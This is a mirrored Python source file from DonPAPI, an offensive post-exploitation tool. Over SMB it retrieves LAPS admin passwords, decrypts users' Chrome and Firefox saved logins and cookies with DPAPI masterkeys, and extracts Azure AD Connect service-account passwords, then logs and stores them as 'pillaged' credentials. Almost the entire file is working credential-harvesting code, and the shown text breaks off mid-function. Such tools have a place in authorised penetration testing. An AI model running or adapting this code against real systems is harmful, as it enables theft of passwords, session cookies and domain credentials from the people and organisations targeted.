mirror of
https://github.com/login-securite/DonPAPI
synced 2024-12-17 20:55:15 +00:00
2002 lines
97 KiB
Python
2002 lines
97 KiB
Python
#!/usr/bin/env python
|
|
# coding:utf-8
|
|
'''
|
|
PA Vandewoestyne
|
|
'''
|
|
from __future__ import division
|
|
from __future__ import print_function
|
|
|
|
import copy
|
|
from pathlib import Path
|
|
|
|
from lib.secretsdump import LSASecrets as MyLSASecrets
|
|
from lib.secretsdump import SAMHashes as MySAMHashes
|
|
import socket,impacket
|
|
|
|
from impacket.dcerpc.v5 import srvs
|
|
from impacket.dcerpc.v5.dtypes import NULL
|
|
from impacket.smb import SMB_DIALECT
|
|
|
|
#import impacket.dpapi
|
|
from lib.dpapi import DPAPI, CredHist
|
|
from software.browser.chrome_decrypt import *
|
|
from software.browser.firefox_decrypt import *
|
|
from software.sysadmin.vnc import Vnc
|
|
from lib.toolbox import is_guid
|
|
from myusers import *
|
|
from lib.fileops import MyRegOps
|
|
from database import database
|
|
from lib.new_module import *
|
|
from lib.RecentFiles import *
|
|
from lib.adconnect import *
|
|
from ldap3 import ALL, Server, Connection, NTLM
|
|
#from lib.lazagne_dpapi.credhist import CredHistFile
|
|
|
|
class MySeatBelt:
|
|
def __init__(self, target, options, logger, verbose=1):
|
|
self.logging = logger
|
|
self.options = copy.deepcopy(options)
|
|
self.options.target_ip = target
|
|
self.host = target
|
|
#self.username=options.username
|
|
#self.password=options.password
|
|
#self.domain=options.domain
|
|
self.options.timeout=5
|
|
self.smb = None
|
|
#options.target_ip=target
|
|
"""
|
|
self.logging.info(f"[{target}] [-] initialising smb connection to {options.domain} / {options.username} : {options.password}, @ {options.dc_ip} , Hash : {options.lmhash} : { options.nthash}, AESKey {options.aesKey}")
|
|
smbClient = SMBConnection(options.address, target, sess_port=int(options.port))
|
|
if options.k is True:
|
|
smbClient.kerberosLogin(options.username, options.password, options.domain, options.lmhash, options.nthash, options.aesKey, options.dc_ip )
|
|
else:
|
|
smbClient.login(options.username, options.password, options.domain, options.lmhash, options.nthash)
|
|
|
|
self.smb = smbClient
|
|
"""
|
|
#Init all
|
|
self.smbv1 = False
|
|
self.admin_privs = False
|
|
#self.username, self.password, self.domain, self.lmhash, self.nthash, self.aesKey, self.TGT, self.TGS = self.smb.getCredentials()
|
|
self.share = None
|
|
self.last_output = None
|
|
self.completion = []
|
|
self.users = []
|
|
self.user_path = ''
|
|
self.machine_key = []
|
|
self.user_key = []
|
|
|
|
#self.options[logging] = logge
|
|
self.myfileops = None
|
|
self.myregops = None
|
|
#self.myfileops = MyFileOps(self.smb,self.logging,self.options)
|
|
self.credz = options.credz
|
|
self.__remoteOps = None
|
|
self.__bootKey = b''
|
|
self.__SAMHashes = None
|
|
self.__LSASecrets = None
|
|
self.global_logfile = b'globallog.log'
|
|
self.init_connect()
|
|
#logger.init()
|
|
|
|
def init_connect(self):
|
|
try:
|
|
self.db = database(sqlite3.connect(self.options.db_path, check_same_thread=False), self.logging)
|
|
if self.create_conn_obj():
|
|
#self.do_info_rpc_unauth()
|
|
self.do_info_unauth()
|
|
self.create_conn_obj()
|
|
if self.login_conn():
|
|
self.is_admin()
|
|
if self.admin_privs:
|
|
self.myfileops = MyFileOps(self.smb, self.logging, self.options)
|
|
self.myregops = MyRegOps(self.logging,self.options)
|
|
return True
|
|
else:
|
|
return False
|
|
return False
|
|
except Exception as e:
|
|
self.logging.debug('Error init connect')
|
|
return False
|
|
|
|
|
|
def create_smbv1_conn(self):
|
|
try:
|
|
self.smb = SMBConnection(self.host, self.host, None, self.options.port, preferredDialect=SMB_DIALECT, timeout=self.options.timeout)
|
|
self.smbv1 = True
|
|
logging.debug('SMBv1 OK on {} - {}'.format(self.host,self.options.target_ip))
|
|
except socket.error as e:
|
|
if str(e).find('Connection reset by peer') != -1:
|
|
logging.debug('SMBv1 might be disabled on {}'.format(self.host))
|
|
return False
|
|
except Exception as e:
|
|
logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e))
|
|
return False
|
|
|
|
return True
|
|
|
|
def create_smbv3_conn(self):
|
|
try:
|
|
self.smb = SMBConnection(self.host, self.host, None, self.options.port, timeout=self.options.timeout)
|
|
self.smbv1 = False
|
|
logging.debug('SMBv3 OK on {} - {}'.format(self.host,self.options.target_ip))
|
|
except Exception as e:
|
|
self.logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e))
|
|
self.db.add_computer(ip=self.host,connectivity=f"{e}")
|
|
return False
|
|
|
|
return True
|
|
|
|
def create_conn_obj(self):
|
|
#self.logging.info(f"[{self.options.target_ip}] [-] initialising smb connection to {self.options.domain} / {self.options.username} : {self.options.password}, @ {self.options.dc_ip} , Hash : {self.options.lmhash} : {self.options.nthash}, AESKey {self.options.aesKey}")
|
|
self.logging.debug(f"[{self.options.target_ip}] [-] initialising smb connection ...")
|
|
if self.create_smbv1_conn():
|
|
return True
|
|
elif self.create_smbv3_conn():
|
|
return True
|
|
|
|
return False
|
|
|
|
def quit(self):
|
|
try:
|
|
self.logging.debug(f"[{self.options.target_ip}] [-] initialising smb close ...")
|
|
#self.myfileops.close()
|
|
#self.myregops.close()
|
|
#self.smb.close()
|
|
self.logging.debug(f"[{self.options.target_ip}] [-] smb closed ...")
|
|
except Exception as e:
|
|
self.logging.debug('Error in closing SMB connection')
|
|
return False
|
|
|
|
def get_laps(self):
|
|
try:
|
|
self.logging.debug(f"[{self.options.target_ip}] [-] Using LAPS to get Local admin password on {self.options.hostname} - domain {self.options.domain} : dcip {self.options.dc_ip}")
|
|
ldap_domain = ''
|
|
ldap_domain_parts = self.options.domain.split('.')
|
|
for part in ldap_domain_parts:
|
|
ldap_domain += f"dc={part},"
|
|
ldap_domain = ldap_domain[:-1]
|
|
|
|
if self.options.dc_ip != None:
|
|
s = Server(self.options.dc_ip, get_info=ALL)
|
|
else:
|
|
s = Server(self.options.domain, get_info=ALL)
|
|
c = Connection(s, user=self.options.domain + "\\" + self.options.username, password=self.options.password, authentication=NTLM, auto_bind=True)
|
|
c.search(search_base=f"{ldap_domain}",
|
|
search_filter=f'(&(cn={self.options.hostname})(ms-MCS-AdmPwd=*))',
|
|
attributes=['ms-MCS-AdmPwd', 'SAMAccountname'])
|
|
self.logging.debug(f"[{self.options.target_ip}] [-] Using LAPS to get Local admin password on {self.options.hostname} - {ldap_domain} - got {len(c.entries)} match")
|
|
if len(c.entries)==1:
|
|
#for entry in c.entries[0]:
|
|
entry=c.entries[0]
|
|
#self.options.username = str(entry['sAMAccountName'])
|
|
self.options.password = str(entry['ms-Mcs-AdmPwd'])
|
|
#self.username = self.options.username
|
|
#self.password = self.options.password
|
|
self.options.local_auth = True
|
|
self.options.domain = self.options.hostname
|
|
return True
|
|
else:
|
|
return False
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] Exception {bcolors.WARNING} in get LAPS {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
return False
|
|
|
|
def login_conn(self,username=None,password=None,domain=None):
|
|
try:
|
|
if username is None:
|
|
username=self.options.username
|
|
if password==None:
|
|
password=self.options.password
|
|
if domain==None:
|
|
domain=self.options.domain
|
|
#smbClient = SMBConnection(options.address, target, sess_port=int(options.port))
|
|
if self.options.k is True:
|
|
self.logging.debug(f"[{self.options.target_ip}] [-] initialising smb Kerberos Authentification to {self.options.domain} / {self.options.username} : {self.options.password}, @ {self.options.dc_ip} , Hash : {self.options.lmhash} : {self.options.nthash}, AESKey {self.options.aesKey}")
|
|
self.smb.kerberosLogin(username, password, domain, self.options.lmhash, self.options.nthash, self.options.aesKey, self.options.dc_ip)
|
|
return True
|
|
#elif self.options.hashes != None:
|
|
else:
|
|
if self.options.laps is True and username != '' and password != '': # not doing LAPS for null session
|
|
if(self.get_laps()):
|
|
for username in ['administrator','administrateur','administrador']:
|
|
try:
|
|
self.logging.debug(f"[{self.options.target_ip}] [-] initialising smb Local Authentification to {self.options.domain} / {username} : {self.options.password}, @ {self.host} , Hash : {self.options.lmhash} : {self.options.nthash}, AESKey {self.options.aesKey}")
|
|
self.smb.login(username, self.options.password, self.options.domain, self.options.lmhash, self.options.nthash, ntlmFallback=True)
|
|
self.options.username=username
|
|
if username not in self.options.credz:
|
|
self.options.credz[username] = [self.options.password]
|
|
else:
|
|
self.options.credz[username].append(self.options.password)
|
|
return True
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] Exception {bcolors.WARNING} in LOGIN_Connection - LAPS with {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
continue
|
|
else:
|
|
if username == "" and password == "":
|
|
try:
|
|
self.logging.debug(f"[{self.options.target_ip}] [-] initialising smb NullSession to {self.host}")
|
|
self.smb.login(username, password, domain, self.options.lmhash, self.options.nthash,ntlmFallback=True)
|
|
except Exception as ex:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] Exception {bcolors.WARNING} in NullSession {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
return False
|
|
else:
|
|
self.logging.debug(f"[{self.options.target_ip}] [-] initialising smb Authentification to {domain} / {username} : {password}, @ {self.host} , Hash : {self.options.lmhash} : {self.options.nthash}, AESKey {self.options.aesKey}")
|
|
self.smb.login(username, password, domain, self.options.lmhash, self.options.nthash, ntlmFallback=True)
|
|
'''except : #self.smb.STATUS_LOGON_FAILURE :
|
|
try:
|
|
if domain != self.hostname:
|
|
#Trying localy
|
|
self.smb.login(username, password, self.hostname, self.options.lmhash, self.options.nthash, ntlmFallback=True)
|
|
return True
|
|
else:#On pourrait tenter une connexion domain, mais on risque d'augmenter le compte des erreurs
|
|
self.logging.error(f"[{self.options.target_ip}] Error {bcolors.WARNING} Connexion refused with credentials {domain}/{username}:{password}@{self.host} {bcolors.ENDC}")
|
|
return False
|
|
except Exception as ex:
|
|
self.logging.error(f"[{self.options.target_ip}] Exception {bcolors.WARNING} Connexion Error in Local attempt {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
return False'''
|
|
#self.username, self.password, self.domain, self.lmhash, self.nthash, self.aesKey, self.TGT, self.TGS = self.smb.getCredentials()
|
|
return True
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] Exception {bcolors.WARNING} in LOGIN_Connection {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
return False
|
|
|
|
|
|
def GetUserByName(self,username):
|
|
for user in self.users:
|
|
if user.username==username:
|
|
return user
|
|
else:
|
|
self.logging.debug("User %s Not found in self.users"%username)
|
|
|
|
|
|
def is_admin(self):
|
|
self.logging.debug(f"[{self.options.target_ip}] Checking if is admin ")
|
|
self.admin_privs = False
|
|
try:
|
|
self.smb.connectTree("C$")
|
|
self.admin_privs = True
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}Is ADMIN{bcolors.ENDC}")
|
|
self.db.update_computer(ip=self.options.target_ip,is_admin=True)
|
|
except SessionError as e:
|
|
self.logging.debug( f"[{self.options.target_ip}] {bcolors.WARNING}Exception in IS ADMIN{bcolors.ENDC}")
|
|
self.logging.debug(f"[{self.options.target_ip}] {e}")
|
|
self.db.update_computer(ip=self.options.target_ip, is_admin=False)
|
|
pass
|
|
return self.admin_privs
|
|
|
|
|
|
def do_info_unauth(self):
|
|
#self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
|
|
try:
|
|
#Null session to get basic infos
|
|
self.login_conn(username='',password='')
|
|
#self.domain = self.smb.getServerDNSDomainName()
|
|
self.options.hostname = self.smb.getServerName()
|
|
#self.options.hostname=self.hostname
|
|
self.server_os = self.smb.getServerOS()
|
|
self.signing = self.smb.isSigningRequired() if self.smbv1 else self.smb._SMBConnection._Connection['RequireSigning']
|
|
# self.os_arch = self.get_os_arch()
|
|
if self.options.domain == '': #no domain info == local auth
|
|
self.options.domain = self.options.hostname
|
|
#elif self.options.domain != '':
|
|
# self.domain = self.options.domain
|
|
|
|
self.logging.info(f"[{self.options.target_ip}] [+] {bcolors.OKBLUE}{self.options.hostname}{bcolors.ENDC} (domain:{self.smb.getServerDNSDomainName()}) ({self.server_os}) [SMB Signing {'Enabled' if self.signing else 'Disabled'}]")
|
|
self.db.add_computer(ip=self.options.target_ip,hostname=self.options.hostname,domain=self.smb.getServerDNSDomainName(),os=self.server_os,smb_signing_enabled=self.signing,smbv1_enabled=self.smbv1)
|
|
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] Exception {bcolors.WARNING} in DO INFO UNAUTH {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def do_info_rpc_unauth(self):
|
|
try:
|
|
rpctransport = transport.SMBTransport(self.smb.getRemoteHost(), filename=r'\srvsvc', smb_connection=self.smb)
|
|
dce = rpctransport.get_dce_rpc()
|
|
dce.connect()
|
|
dce.bind(srvs.MSRPC_UUID_SRVS)
|
|
resp = srvs.hNetrServerGetInfo(dce, 102)
|
|
self.logging.debug("Server Name: %s" % resp['InfoStruct']['ServerInfo102']['sv102_name'])
|
|
self.hostname = resp['InfoStruct']['ServerInfo102']['sv102_name']
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] Exception {bcolors.WARNING} in DO INFO {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
def do_info_with_auth(self):
|
|
#self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
|
|
try:
|
|
#Null session to get basic infos
|
|
self.login_conn()
|
|
#self.domain = self.smb.getServerDNSDomainName()
|
|
self.options.hostname = self.smb.getServerName()
|
|
self.server_os = self.smb.getServerOS()
|
|
self.signing = self.smb.isSigningRequired() if self.smbv1 else self.smb._SMBConnection._Connection['RequireSigning']
|
|
# self.os_arch = self.get_os_arch()
|
|
if not self.domain and self.options.domain == '':
|
|
self.domain = self.options.hostname
|
|
elif self.options.domain != '':
|
|
self.domain = self.options.domain
|
|
|
|
self.logging.info(
|
|
f"[{self.options.target_ip}] [+] {bcolors.OKBLUE}{self.hostname}{bcolors.ENDC} (domain:{self.domain}) {self.hostname} ({self.server_os}) [SMB Signing {'Enabled' if self.signing else 'Disabled'}]")
|
|
#IP# print(self.smb.getRemoteHost())
|
|
#print(self.smb.getServerDNSDomainName())
|
|
rpctransport = transport.SMBTransport(self.smb.getRemoteHost(), filename=r'\srvsvc', smb_connection=self.smb)
|
|
dce = rpctransport.get_dce_rpc()
|
|
dce.connect()
|
|
dce.bind(srvs.MSRPC_UUID_SRVS)
|
|
resp = srvs.hNetrServerGetInfo(dce, 102)
|
|
#self.signing = self.smb.isSigningRequired() if self.smbv1 else self.smb._SMBConnection._Connection['RequireSigning']
|
|
#self.os_arch = self.get_os_arch()
|
|
|
|
#self.logging.debug("Version Major: %d" % resp['InfoStruct']['ServerInfo102']['sv102_version_major'])
|
|
#self.logging.debug("Version Minor: %d" % resp['InfoStruct']['ServerInfo102']['sv102_version_minor'])
|
|
#self.logging.debug("Server Name: %s" % resp['InfoStruct']['ServerInfo102']['sv102_name'])
|
|
#self.logging.debug("Server Comment: %s" % resp['InfoStruct']['ServerInfo102']['sv102_comment'])
|
|
#self.logging.debug("Server UserPath: %s" % resp['InfoStruct']['ServerInfo102']['sv102_userpath'])
|
|
#self.logging.debug("Simultaneous Users: %d" % resp['InfoStruct']['ServerInfo102']['sv102_users'])
|
|
#USE user path
|
|
self.user_path = resp['InfoStruct']['ServerInfo102']['sv102_userpath']
|
|
|
|
self.db.add_computer(ip=self.options.target_ip,hostname=self.hostname,domain=self.domain,os=self.server_os)
|
|
self.logging.info(f"[{self.options.target_ip}] [+] {bcolors.OKBLUE}{self.hostname}{bcolors.ENDC} (domain:{self.domain}) ({self.server_os} - {resp['InfoStruct']['ServerInfo102']['sv102_comment']} -{resp['InfoStruct']['ServerInfo102']['sv102_userpath']} - {resp['InfoStruct']['ServerInfo102']['sv102_users']})")
|
|
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] Exception {bcolors.WARNING} in DO INFO AUTH{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def logsecret(self,data):
|
|
try:
|
|
fh = open(self.global_logfile, 'ab')
|
|
fh.write(data.encode())
|
|
fh.close()
|
|
self.logging.info(f"[{self.options.target_ip}] [+] {bcolors.OKGREEN} {data} {bcolors.ENDC}")
|
|
except Exception as ex:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Exception logsecret for {data} {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def GetMozillaSecrets_wrapper(self):
|
|
self.logging.info(f"[{self.options.target_ip}] {bcolors.OKBLUE}[+] Gathering Mozilla Secrets {bcolors.ENDC}")
|
|
|
|
for user in self.users:
|
|
if user.username == 'MACHINE$':
|
|
continue
|
|
try:
|
|
myoptions = copy.deepcopy(self.options)
|
|
myoptions.file = None # "chrome_enc_blob.tmp" # BLOB to parse
|
|
myoptions.key = None
|
|
myoptions.masterkeys = None
|
|
myFirefoxSecrets = FIREFOX_LOGINS(myoptions, self.logging, user, self.myfileops,self.db)
|
|
myFirefoxSecrets.run()
|
|
except Exception as ex:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Exception GetMozillaSecrets_wrapper for {user.username} {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
def GetChormeSecrets(self):
|
|
self.logging.info(f"[{self.options.target_ip}] {bcolors.OKBLUE}[+] Gathering Chrome Secrets {bcolors.ENDC}")
|
|
blacklist = ['.', '..']
|
|
# Parse chrome
|
|
# autres navigateurs ?
|
|
|
|
user_directories = [("Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data", 'Local State', 'ChromeLocalState', 'DOMAIN'),
|
|
("Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Default", 'Cookies', 'ChromeCookies', 'DOMAIN'),
|
|
("Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Default", 'Login Data', 'ChromeLoginData', 'DOMAIN'),
|
|
]
|
|
|
|
|
|
for user in self.users:
|
|
if user.username == 'MACHINE$':
|
|
continue
|
|
else:
|
|
directories_to_use = user_directories
|
|
myoptions = copy.deepcopy(self.options)
|
|
myoptions.file = None # "chrome_enc_blob.tmp" # BLOB to parse
|
|
myoptions.key = None
|
|
myoptions.masterkeys = None
|
|
myChromeSecrets = CHROME_LOGINS(myoptions, self.logging, self.db,user.username)
|
|
|
|
# if len(user.masterkeys)>0:#Pas de masterkeys==pas de datas a recup
|
|
for info in directories_to_use:
|
|
my_dir, my_mask, my_blob_type, my_user_type = info
|
|
tmp_pwd = my_dir.format(username=user.username)#tmp_pwd = f"Users\\{user.username}\\{my_dir}"#ntpath.join(ntpath.join('Users', user.username), my_dir)
|
|
self.logging.debug(f"[{self.options.target_ip}] Looking for {user.username} files in {tmp_pwd} with mask {my_mask}")
|
|
my_directory = self.myfileops.do_ls(tmp_pwd, my_mask, display=False)
|
|
for infos in my_directory:
|
|
longname, is_directory = infos
|
|
self.logging.debug("ls returned file %s" % longname)
|
|
if longname not in blacklist and not is_directory:
|
|
try:
|
|
self.logging.debug(f"[{self.options.target_ip}] [+] Found {bcolors.OKBLUE}{user.username}{bcolors.ENDC} Chrome files : {longname}")
|
|
# Downloading Blob file
|
|
localfile = self.myfileops.get_file(ntpath.join(tmp_pwd, longname),allow_access_error=True)
|
|
#myoptions = copy.deepcopy(self.options)
|
|
if my_blob_type == 'ChromeLocalState':
|
|
try:
|
|
myChromeSecrets.localstate_path=localfile
|
|
guid=myChromeSecrets.get_masterkey_guid_from_localstate()
|
|
if guid != None:
|
|
masterkey = self.get_masterkey(user=user, guid=guid, type=my_user_type)
|
|
if masterkey != None:
|
|
if masterkey['status'] == 'decrypted':
|
|
myChromeSecrets.masterkey = masterkey['key']
|
|
aesKey = myChromeSecrets.get_AES_key_from_localstate(masterkey=masterkey['key'])
|
|
if aesKey != None:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKGREEN}Decryption successfull of {bcolors.OKBLUE}{user.username}{bcolors.ENDC} Chrome AES Key {aesKey} {bcolors.ENDC}")
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting AES Key for Chrome Local State with Masterkey{bcolors.ENDC}")
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting AES Key for Chrome Local State - Masterkey not decrypted{bcolors.ENDC}")
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting AES Key for Chrome Local State with Masterkey- cant get masterkey {guid}{bcolors.ENDC}")
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting AES Key for Chrome Local State with Masterkey - can t get the GUID of masterkey from blob file{bcolors.ENDC}")
|
|
except Exception as ex:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Exception in ChromeLocalState{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
if my_blob_type == 'ChromeLoginData':
|
|
try:
|
|
myChromeSecrets.logindata_path=localfile
|
|
user.files[longname] = {}
|
|
user.files[longname]['type'] = my_blob_type
|
|
user.files[longname]['status'] = 'encrypted'
|
|
user.files[longname]['path'] = localfile
|
|
logins=myChromeSecrets.decrypt_chrome_LoginData()
|
|
user.files[longname]['secret'] = logins
|
|
if logins is not None:
|
|
user.files[longname]['status'] = 'decrypted'
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting logindata for CHROME {user.username} {localfile} {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
if my_blob_type == 'ChromeCookies':
|
|
try:
|
|
myChromeSecrets.cookie_path=localfile
|
|
user.files[longname] = {}
|
|
user.files[longname]['type'] = my_blob_type
|
|
user.files[longname]['status'] = 'encrypted'
|
|
user.files[longname]['path'] = localfile
|
|
cookies=myChromeSecrets.decrypt_chrome_CookieData()
|
|
user.files[longname]['secret'] = cookies
|
|
if cookies is not None:
|
|
user.files[longname]['status'] = 'decrypted'
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting CookieData for CHROME {user.username} {localfile} {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
except Exception as ex:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting Blob for {localfile} with Masterkey{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def getMdbData(self):
|
|
try:
|
|
return self.getMdbData2()
|
|
except UnicodeDecodeError:
|
|
return self.getMdbData2('utf-16-le')
|
|
def getMdbData2(self, codec='utf-8'):
|
|
try:
|
|
out = {
|
|
'cryptedrecords': [],
|
|
'xmldata': []
|
|
}
|
|
keydata = None
|
|
#
|
|
#self.options.from_file='adsync_export'
|
|
|
|
if self.options.from_file:
|
|
logging.info('Loading configuration data from %s on filesystem', self.options.from_file)
|
|
infile = codecs.open(self.options.from_file, 'r', codec)
|
|
enumtarget = infile
|
|
else:
|
|
logging.info('Querying database for configuration data')
|
|
dbpath = os.path.join(os.getcwd(), r"ADSync.mdf")
|
|
output = subprocess.Popen(["ADSyncQuery.exe", dbpath], stdout=subprocess.PIPE).communicate()[0]
|
|
enumtarget = output.split('\n')
|
|
|
|
#####TEMP
|
|
#logging.info('Loading configuration data from %s on filesystem', self.__options.from_file)
|
|
#infile = codecs.open('adsync_export', 'r', codec)
|
|
#enumtarget = infile
|
|
######
|
|
|
|
for line in enumtarget:
|
|
print(line)
|
|
try:
|
|
ltype, data = line.strip().split(': ')
|
|
except ValueError:
|
|
continue
|
|
ltype = ltype.replace(u'\ufeff', u'')
|
|
if ltype.lower() == 'record':
|
|
xmldata, crypteddata = data.split(';')
|
|
out['cryptedrecords'].append(crypteddata)
|
|
out['xmldata'].append(xmldata)
|
|
#print(f"record found : {xmldata}")
|
|
|
|
if ltype.lower() == 'config':
|
|
instance, keyset_id, entropy = data.split(';')
|
|
out['instance'] = instance
|
|
out['keyset_id'] = keyset_id
|
|
out['entropy'] = entropy
|
|
#if self.__options.from_file:
|
|
# infile.close()
|
|
# Check if all values are in the outdata
|
|
required = ['cryptedrecords', 'xmldata', 'instance', 'keyset_id', 'entropy']
|
|
for option in required:
|
|
if not option in out:
|
|
logging.error(
|
|
'Missing data from database. Option %s could not be extracted. Check your database or output file.',
|
|
option)
|
|
return None
|
|
return out
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception in Parsing database : Please manualy run ADSyncQuery.exe ADSync.mdf > adsync_export on a windows env with MSSQL support{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
def Get_AD_Connect(self,user, localfile, data):
|
|
#Local DPAPI extracted data
|
|
info=""
|
|
parts = data['Target'].decode('utf-16le')[:-1].split('_')
|
|
localBlobdatas= {
|
|
'instanceid': parts[3][1:-1].lower(),
|
|
'keyset_id': parts[4],
|
|
'data': data['Unknown3']
|
|
}
|
|
#print(localBlobdatas)
|
|
|
|
#ADConnect Database data
|
|
logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE} Trying to get ADConnect account{bcolors.ENDC}")
|
|
try:
|
|
#Stop Service / Download DB / Start DB
|
|
myADSRemoteOps = ADSRemoteOperations(smbConnection=self.smb, doKerberos=False)
|
|
myADSRemoteOps.gatherAdSyncMdb()
|
|
#files_to_dl=['Program Files\\Microsoft Azure AD Sync\\Data\\ADSync.mdf','Program Files\\Microsoft Azure AD Sync\\Data\\ADSync_log.ldf']
|
|
mdbdata=self.getMdbData()
|
|
if mdbdata is None:
|
|
logging.debug(f"[{self.options.target_ip}] Could not extract required database information. Exiting")
|
|
return
|
|
#print(mdbdata)
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception in ADSRemoteOperations 1{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
result=localBlobdatas
|
|
if result is not None:
|
|
if result['keyset_id'] != mdbdata['keyset_id'] or result['instanceid'] != mdbdata['instance']:
|
|
logging.debug('Found keyset %s instance %s, but need keyset %s instance %s. Trying next',
|
|
result['keyset_id'], result['instanceid'], mdbdata['keyset_id'], mdbdata['instance'])
|
|
else:
|
|
logging.debug('Found correct encrypted keyset to decrypt data')
|
|
if result is None:
|
|
logging.debug('Failed to find correct keyset data')
|
|
return
|
|
|
|
#cryptkeys = [self.__remoteOps.decryptDpapiBlobSystemkey(result['data'], self.dpapiSystem['MachineKey'],string_to_bin(mdbdata['entropy']))]
|
|
myoptions = copy.deepcopy(self.options)
|
|
myoptions.file = None # "key_material.tmp" # BLOB to parse
|
|
myoptions.key = None
|
|
myoptions.masterkeys = None # user.masterkeys_file
|
|
mydpapi = DPAPI(myoptions, self.logging)
|
|
guid = mydpapi.find_Blob_masterkey(raw_data=result['data'])
|
|
self.logging.debug(f"[{self.options.target_ip}] Looking for ADConnect masterkey : {guid}")
|
|
if guid != None:
|
|
machine_user=user=self.GetUserByName('MACHINE$')
|
|
masterkey = self.get_masterkey(user=machine_user, guid=guid, type='MACHINE')
|
|
if masterkey != None:
|
|
if masterkey['status'] == 'decrypted':
|
|
mydpapi.options.key = masterkey['key']
|
|
# cred_data = mydpapi.decrypt_credential()
|
|
cryptkeys = [mydpapi.decrypt_blob(raw_data=result['data'],entropy=string_to_bin(mdbdata['entropy']))]
|
|
try:
|
|
logging.debug(f'Decrypting encrypted AD Sync configuration data with {cryptkeys}')
|
|
for index, record in enumerate(mdbdata['cryptedrecords']):
|
|
# Try decrypting with highest cryptkey record
|
|
self.logging.debug(f"[{self.options.target_ip}] {index} - {record}")
|
|
drecord = DumpSecrets.decrypt(record, cryptkeys[-1]).replace('\x00', '')
|
|
#print(drecord)
|
|
with open('r%d_xml_data.xml' % index, 'w') as outfile:
|
|
data = base64.b64decode(mdbdata['xmldata'][index]).decode('utf-16-le')
|
|
outfile.write(data)
|
|
with open('r%d_encrypted_data.xml' % index, 'w') as outfile:
|
|
outfile.write(drecord)
|
|
ctree = ET.fromstring(drecord)
|
|
dtree = ET.fromstring(data)
|
|
if 'forest-login-user' in data:
|
|
logging.debug('Local AD credentials')
|
|
el = dtree.find(".//parameter[@name='forest-login-domain']")
|
|
if el is not None:
|
|
logging.debug('\tDomain: %s', el.text)
|
|
username=el.text
|
|
el = dtree.find(".//parameter[@name='forest-login-user']")
|
|
if el is not None:
|
|
username+='/'+el.text
|
|
#logging.debug('\tUsername: %s', el.text)
|
|
else:
|
|
# Assume AAD config
|
|
logging.debug('Azure AD credentials')
|
|
el = dtree.find(".//parameter[@name='UserName']")
|
|
if el is not None:
|
|
username=el.text
|
|
logging.debug('\tUsername: %s', el.text)
|
|
# Can be either lower or with capital P
|
|
fpw = None
|
|
el = ctree.find(".//attribute[@name='Password']")
|
|
if el is not None:
|
|
fpw = el.text
|
|
el = ctree.find(".//attribute[@name='password']")
|
|
if el is not None:
|
|
fpw = el.text
|
|
if fpw:
|
|
# fpw = fpw[:len(fpw)/2] + '...[REDACTED]'
|
|
logging.debug('\tPassword: %s', fpw)
|
|
info+=f"{username} : {fpw}\n"
|
|
self.logging.info(
|
|
f"[{self.options.target_ip}] [+] {bcolors.OKGREEN} ADCONNECT : {bcolors.OKGREEN} - {username} : {fpw}{bcolors.ENDC}")
|
|
############PROCESSING DATA
|
|
self.db.add_credz(credz_type='ADConnect',
|
|
credz_username=username,
|
|
credz_password=fpw,
|
|
credz_target='',
|
|
credz_path='', # user.files['ADCONNECT']['path'],
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=user.username)
|
|
except Exception as ex:
|
|
